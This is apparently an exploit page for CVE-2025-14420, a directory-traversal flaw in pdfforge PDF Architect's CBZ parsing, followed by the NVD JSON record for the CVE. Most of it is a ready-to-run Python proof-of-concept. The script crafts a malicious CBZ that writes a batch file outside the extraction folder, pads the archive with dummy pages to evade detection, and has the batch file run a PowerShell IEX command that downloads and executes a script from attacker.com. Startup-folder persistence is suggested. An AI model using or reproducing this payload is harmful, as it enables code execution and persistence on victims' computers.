CVE-2025-14420

#!/usr/bin/env python3 # CVE-2025-14420 PoC - CBZ Directory Traversal RCE # Generate malicious CBZ file for pdfforge PDF Architect import zipfile import os import sys def create_malicious_cbz(output_path, target_path, malicious_content): """ Create a malicious CBZ file with path traversal payload Args: output_path: Path to save the malicious CBZ file target_path: Path to write to (use ../ for traversal) malicious_content: Content to write to the target file """ with zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED) as cbz: # Path traversal payload - escape from extraction directory malicious_filename = f"../../../../{target_path}" # Add malicious file with path traversal info = zipfile.ZipInfo(malicious_filename) info.compress_type = zipfile.ZIP_DEFLATED cbz.writestr(info, malicious_content) # Add legitimate-looking content to evade detection cbz.writestr('page1.jpg', b'\x00' * 100) # Dummy image data cbz.writestr('page2.jpg', b'\x00' * 100) print(f"[+] Malicious CBZ created: {output_path}") print(f"[+] Payload will write to: {target_path}") def create_rce_payload(): """ Generate a reverse shell or command execution payload Modify this function based on target system """ # Example: Write a batch script for Windows payload = '''@echo off powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" ''' return payload.encode() if __name__ == '__main__': # Configuration output_cbz = 'malicious.cbz' # Target paths for different exploitation scenarios: # 1. Write to startup folder (persistence) # startup_path = 'Users/Public/Startup/payload.bat' # 2. Write to temp folder for execution temp_path = 'Temp/malicious.bat' # Generate payload payload = create_rce_payload() # Create malicious CBZ create_malicious_cbz(output_cbz, temp_path, payload) print('[+] PoC generated. Target must open this CBZ file with vulnerable PDF Architect.')

{"cve": {"id": "CVE-2025-14420", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:49.030", "lastModified": "2026-01-02T21:49:08.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "pdfforge PDF Architect CBZ File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of CBZ files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27514."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfforge:pdf_architect:9.1.74.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABF2DE43-AF21-4EFD-917E-1E57E0E1FF15"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1077/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}